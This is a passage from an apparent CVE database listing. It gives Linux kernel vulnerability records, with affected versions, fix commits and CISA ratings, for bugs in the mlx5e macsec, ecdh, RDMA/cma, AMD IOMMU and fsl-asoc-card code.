"lessThan": "514d9c6a39213d8200884e70f60ce7faef1ee597",
"status": "affected",
"version": "4411a6c0abd3e55b4a4fb9432b3a0553f12337c2",
"versionType": "git"
},
{
"lessThan": "9828994ac492e8e7de47fe66097b7e665328f348",
"status": "affected",
"version": "4411a6c0abd3e55b4a4fb9432b3a0553f12337c2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "6.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix macsec possible null dereference when updating MAC security entity (SecY)\n\nUpon updating MAC security entity (SecY) in hw offload path, the macsec\nsecurity association (SA) initialization routine is called. In case of\nextended packet number (epn) is enabled the salt and ssci attributes are\nretrieved using the MACsec driver rx_sa context which is unavailable when\nupdating a SecY property such as encoding-sa hence the null dereference.\nFix by using the provided SA to set those attributes."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:24.871Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/514d9c6a39213d8200884e70f60ce7faef1ee597"
},
{
"url": "https://git.kernel.org/stable/c/9828994ac492e8e7de47fe66097b7e665328f348"
}
],
"title": "net/mlx5e: Fix macsec possible null dereference when updating MAC security entity (SecY)",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48882",
"datePublished": "2024-08-21T06:10:13.640Z",
"dateReserved": "2024-07-16T11:38:08.924Z",
"dateUpdated": "2025-05-04T08:25:24.871Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42098 (GCVE-0-2024-42098)
Vulnerability from cvelistv5
Published
2024-07-29 17:39
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: ecdh - explicitly zeroize private_key
private_key is overwritten with the key parameter passed in by the
caller (if present), or alternatively a newly generated private key.
However, it is possible that the caller provides a key (or the newly
generated key) which is shorter than the previous key. In that
scenario, some key material from the previous key would not be
overwritten. The easiest solution is to explicitly zeroize the entire
private_key array first.
Note that this patch slightly changes the behavior of this function:
previously, if the ecc_gen_privkey failed, the old private_key would
remain. Now, the private_key is always zeroized. This behavior is
consistent with the case where params.key is set and ecc_is_key_valid
fails.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.563Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/39173b04abda87872b43c331468a4a14f8f05ce8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fd7ef325911eba1b7191b83cb580463242f2090d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80575b252ab0358b7e93895b2a510beb3cb3f975"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d96187eb8e59b572a8e6a68b6a9837a867ea29df"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/73e5984e540a76a2ee1868b91590c922da8c24c9"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42098",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:15.393547Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:59.924Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"crypto/ecdh.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "39173b04abda87872b43c331468a4a14f8f05ce8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fd7ef325911eba1b7191b83cb580463242f2090d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "80575b252ab0358b7e93895b2a510beb3cb3f975",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d96187eb8e59b572a8e6a68b6a9837a867ea29df",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "73e5984e540a76a2ee1868b91590c922da8c24c9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"crypto/ecdh.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: ecdh - explicitly zeroize private_key\n\nprivate_key is overwritten with the key parameter passed in by the\ncaller (if present), or alternatively a newly generated private key.\nHowever, it is possible that the caller provides a key (or the newly\ngenerated key) which is shorter than the previous key. In that\nscenario, some key material from the previous key would not be\noverwritten. The easiest solution is to explicitly zeroize the entire\nprivate_key array first.\n\nNote that this patch slightly changes the behavior of this function:\npreviously, if the ecc_gen_privkey failed, the old private_key would\nremain. Now, the private_key is always zeroized. This behavior is\nconsistent with the case where params.key is set and ecc_is_key_valid\nfails."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:57.691Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/39173b04abda87872b43c331468a4a14f8f05ce8"
},
{
"url": "https://git.kernel.org/stable/c/fd7ef325911eba1b7191b83cb580463242f2090d"
},
{
"url": "https://git.kernel.org/stable/c/80575b252ab0358b7e93895b2a510beb3cb3f975"
},
{
"url": "https://git.kernel.org/stable/c/d96187eb8e59b572a8e6a68b6a9837a867ea29df"
},
{
"url": "https://git.kernel.org/stable/c/73e5984e540a76a2ee1868b91590c922da8c24c9"
}
],
"title": "crypto: ecdh - explicitly zeroize private_key",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42098",
"datePublished": "2024-07-29T17:39:33.395Z",
"dateReserved": "2024-07-29T15:50:41.173Z",
"dateUpdated": "2025-05-04T09:22:57.691Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48925 (GCVE-0-2022-48925)
Vulnerability from cvelistv5
Published
2024-08-22 01:33
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/cma: Do not change route.addr.src_addr outside state checks
If the state is not idle then resolve_prepare_src() should immediately
fail and no change to global state should happen. However, it
unconditionally overwrites the src_addr trying to build a temporary any
address.
For instance if the state is already RDMA_CM_LISTEN then this will corrupt
the src_addr and would cause the test in cma_cancel_operation():
if (cma_any_addr(cma_src_addr(id_priv)) && !id_priv->cma_dev)
Which would manifest as this trace from syzkaller:
BUG: KASAN: use-after-free in __list_add_valid+0x93/0xa0 lib/list_debug.c:26
Read of size 8 at addr ffff8881546491e0 by task syz-executor.1/32204
CPU: 1 PID: 32204 Comm: syz-executor.1 Not tainted 5.12.0-rc8-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
__dump_stack lib/dump_stack.c:79 [inline]
dump_stack+0x141/0x1d7 lib/dump_stack.c:120
print_address_description.constprop.0.cold+0x5b/0x2f8 mm/kasan/report.c:232
__kasan_report mm/kasan/report.c:399 [inline]
kasan_report.cold+0x7c/0xd8 mm/kasan/report.c:416
__list_add_valid+0x93/0xa0 lib/list_debug.c:26
__list_add include/linux/list.h:67 [inline]
list_add_tail include/linux/list.h:100 [inline]
cma_listen_on_all drivers/infiniband/core/cma.c:2557 [inline]
rdma_listen+0x787/0xe00 drivers/infiniband/core/cma.c:3751
ucma_listen+0x16a/0x210 drivers/infiniband/core/ucma.c:1102
ucma_write+0x259/0x350 drivers/infiniband/core/ucma.c:1732
vfs_write+0x28e/0xa30 fs/read_write.c:603
ksys_write+0x1ee/0x250 fs/read_write.c:658
do_syscall_64+0x2d/0x70 arch/x86/entry/common.c:46
entry_SYSCALL_64_after_hwframe+0x44/0xae
This is indicating that an rdma_id_private was destroyed without doing
cma_cancel_listens().
Instead of trying to re-use the src_addr memory to indirectly create an
any address derived from the dst build one explicitly on the stack and
bind to that as any other normal flow would do. rdma_bind_addr() will copy
it over the src_addr once it knows the state is valid.
This is similar to commit bc0bdc5afaa7 ("RDMA/cma: Do not change
route.addr.src_addr.ss_family")
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48925",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:15.605399Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:11.068Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/cma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5b1cef5798b4fd6e4fd5522e7b8a26248beeacaa",
"status": "affected",
"version": "732d41c545bb359cbb8c94698bdc1f8bcf82279c",
"versionType": "git"
},
{
"lessThan": "00265efbd3e5705038c9492a434fda8cf960c8a2",
"status": "affected",
"version": "732d41c545bb359cbb8c94698bdc1f8bcf82279c",
"versionType": "git"
},
{
"lessThan": "d350724795c7a48b05bf921d94699fbfecf7da0b",
"status": "affected",
"version": "732d41c545bb359cbb8c94698bdc1f8bcf82279c",
"versionType": "git"
},
{
"lessThan": "22e9f71072fa605cbf033158db58e0790101928d",
"status": "affected",
"version": "732d41c545bb359cbb8c94698bdc1f8bcf82279c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/cma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cma: Do not change route.addr.src_addr outside state checks\n\nIf the state is not idle then resolve_prepare_src() should immediately\nfail and no change to global state should happen. However, it\nunconditionally overwrites the src_addr trying to build a temporary any\naddress.\n\nFor instance if the state is already RDMA_CM_LISTEN then this will corrupt\nthe src_addr and would cause the test in cma_cancel_operation():\n\n if (cma_any_addr(cma_src_addr(id_priv)) \u0026\u0026 !id_priv-\u003ecma_dev)\n\nWhich would manifest as this trace from syzkaller:\n\n BUG: KASAN: use-after-free in __list_add_valid+0x93/0xa0 lib/list_debug.c:26\n Read of size 8 at addr ffff8881546491e0 by task syz-executor.1/32204\n\n CPU: 1 PID: 32204 Comm: syz-executor.1 Not tainted 5.12.0-rc8-syzkaller #0\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\n Call Trace:\n __dump_stack lib/dump_stack.c:79 [inline]\n dump_stack+0x141/0x1d7 lib/dump_stack.c:120\n print_address_description.constprop.0.cold+0x5b/0x2f8 mm/kasan/report.c:232\n __kasan_report mm/kasan/report.c:399 [inline]\n kasan_report.cold+0x7c/0xd8 mm/kasan/report.c:416\n __list_add_valid+0x93/0xa0 lib/list_debug.c:26\n __list_add include/linux/list.h:67 [inline]\n list_add_tail include/linux/list.h:100 [inline]\n cma_listen_on_all drivers/infiniband/core/cma.c:2557 [inline]\n rdma_listen+0x787/0xe00 drivers/infiniband/core/cma.c:3751\n ucma_listen+0x16a/0x210 drivers/infiniband/core/ucma.c:1102\n ucma_write+0x259/0x350 drivers/infiniband/core/ucma.c:1732\n vfs_write+0x28e/0xa30 fs/read_write.c:603\n ksys_write+0x1ee/0x250 fs/read_write.c:658\n do_syscall_64+0x2d/0x70 arch/x86/entry/common.c:46\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nThis is indicating that an rdma_id_private was destroyed without doing\ncma_cancel_listens().\n\nInstead of trying to re-use the src_addr memory to indirectly create an\nany address derived from the dst build one explicitly on the stack and\nbind to that as any other normal flow would do. rdma_bind_addr() will copy\nit over the src_addr once it knows the state is valid.\n\nThis is similar to commit bc0bdc5afaa7 (\"RDMA/cma: Do not change\nroute.addr.src_addr.ss_family\")"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:13.379Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5b1cef5798b4fd6e4fd5522e7b8a26248beeacaa"
},
{
"url": "https://git.kernel.org/stable/c/00265efbd3e5705038c9492a434fda8cf960c8a2"
},
{
"url": "https://git.kernel.org/stable/c/d350724795c7a48b05bf921d94699fbfecf7da0b"
},
{
"url": "https://git.kernel.org/stable/c/22e9f71072fa605cbf033158db58e0790101928d"
}
],
"title": "RDMA/cma: Do not change route.addr.src_addr outside state checks",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48925",
"datePublished": "2024-08-22T01:33:11.172Z",
"dateReserved": "2024-08-21T06:06:23.296Z",
"dateUpdated": "2025-05-04T08:26:13.379Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48904 (GCVE-0-2022-48904)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Fix I/O page table memory leak
The current logic updates the I/O page table mode for the domain
before calling the logic to free memory used for the page table.
This results in IOMMU page table memory leak, and can be observed
when launching VM w/ pass-through devices.
Fix by freeing the memory used for page table before updating the mode.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48904",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:23.714235Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:02.557Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/amd/io_pgtable.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "378e2fe1eb58d5c2ed55c8fe5e11f9db5033cdd6",
"status": "affected",
"version": "e42ba0633064ef23eb1c8c21edf96bac1541bd4b",
"versionType": "git"
},
{
"lessThan": "c78627f757e37c2cf386b59c700c4e1574988597",
"status": "affected",
"version": "e42ba0633064ef23eb1c8c21edf96bac1541bd4b",
"versionType": "git"
},
{
"lessThan": "6b0b2d9a6a308bcd9300c2d83000a82812c56cea",
"status": "affected",
"version": "e42ba0633064ef23eb1c8c21edf96bac1541bd4b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/amd/io_pgtable.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/amd: Fix I/O page table memory leak\n\nThe current logic updates the I/O page table mode for the domain\nbefore calling the logic to free memory used for the page table.\nThis results in IOMMU page table memory leak, and can be observed\nwhen launching VM w/ pass-through devices.\n\nFix by freeing the memory used for page table before updating the mode."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:49.056Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/378e2fe1eb58d5c2ed55c8fe5e11f9db5033cdd6"
},
{
"url": "https://git.kernel.org/stable/c/c78627f757e37c2cf386b59c700c4e1574988597"
},
{
"url": "https://git.kernel.org/stable/c/6b0b2d9a6a308bcd9300c2d83000a82812c56cea"
}
],
"title": "iommu/amd: Fix I/O page table memory leak",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48904",
"datePublished": "2024-08-22T01:30:28.907Z",
"dateReserved": "2024-08-21T06:06:23.292Z",
"dateUpdated": "2025-05-04T08:25:49.056Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42089 (GCVE-0-2024-42089)
Vulnerability from cvelistv5
Published
2024-07-29 16:26
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: fsl-asoc-card: set priv->pdev before using it
priv->pdev pointer was set after being used in
fsl_asoc_card_audmux_init().
Move this assignment at the start of the probe function, so
sub-functions can correctly use pdev through priv.
fsl_asoc_card_audmux_init() dereferences priv->pdev to get access to the
dev struct, used with dev_err macros.
As priv is zero-initialised, there would be a NULL pointer dereference.
Note that if priv->dev is dereferenced before assignment but never used,
for example if there is no error to be printed, the driver won't crash
probably due to compiler optimisations.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 708b4351f08c08ea93f773fb9197bdd3f3b08273 Version: 708b4351f08c08ea93f773fb9197bdd3f3b08273 Version: 708b4351f08c08ea93f773fb9197bdd3f3b08273 Version: 708b4351f08c08ea93f773fb9197bdd3f3b08273 Version: 708b4351f08c08ea93f773fb9197bdd3f3b08273 Version: 708b4351f08c08ea93f773fb9197bdd3f3b08273 Version: 708b4351f08c08ea93f773fb9197bdd3f3b08273 Version: 708b4351f08c08ea93f773fb9197bdd3f3b08273 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.275Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae81535ce2503aabc4adab3472f4338070cdeb6a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8896e18b7c366f8faf9344abfd0971435f1c723a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3662eb2170e59b58ad479982dc1084889ba757b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/544ab46b7ece6d6bebbdee5d5659c0a0f804a99a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8faf91e58425c2f6ce773250dfd995f1c2d461ac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29bc9e7c75398b0d12fc30955f2e9b2dd29ffaed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7c18b4d89ff9c810b6e562408afda5ce165c4ea6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90f3feb24172185f1832636264943e8b5e289245"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42089",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:44.318855Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:01.199Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/soc/fsl/fsl-asoc-card.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ae81535ce2503aabc4adab3472f4338070cdeb6a",
"status": "affected",
"version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
"versionType": "git"
},
{
"lessThan": "8896e18b7c366f8faf9344abfd0971435f1c723a",
"status": "affected",
"version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
"versionType": "git"
},
{
"lessThan": "3662eb2170e59b58ad479982dc1084889ba757b9",
"status": "affected",
"version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
"versionType": "git"
},
{
"lessThan": "544ab46b7ece6d6bebbdee5d5659c0a0f804a99a",
"status": "affected",
"version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
"versionType": "git"
},
{
"lessThan": "8faf91e58425c2f6ce773250dfd995f1c2d461ac",
"status": "affected",
"version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
"versionType": "git"
},
{
"lessThan": "29bc9e7c75398b0d12fc30955f2e9b2dd29ffaed",
"status": "affected",
"version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
"versionType": "git"
},
{
"lessThan": "7c18b4d89ff9c810b6e562408afda5ce165c4ea6",
"status": "affected",
"version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
"versionType": "git"
},
{
"lessThan": "90f3feb24172185f1832636264943e8b5e289245",
"status": "affected",
"version": "708b4351f08c08ea93f773fb9197bdd3f3b08273",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/soc/fsl/fsl-asoc-card.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
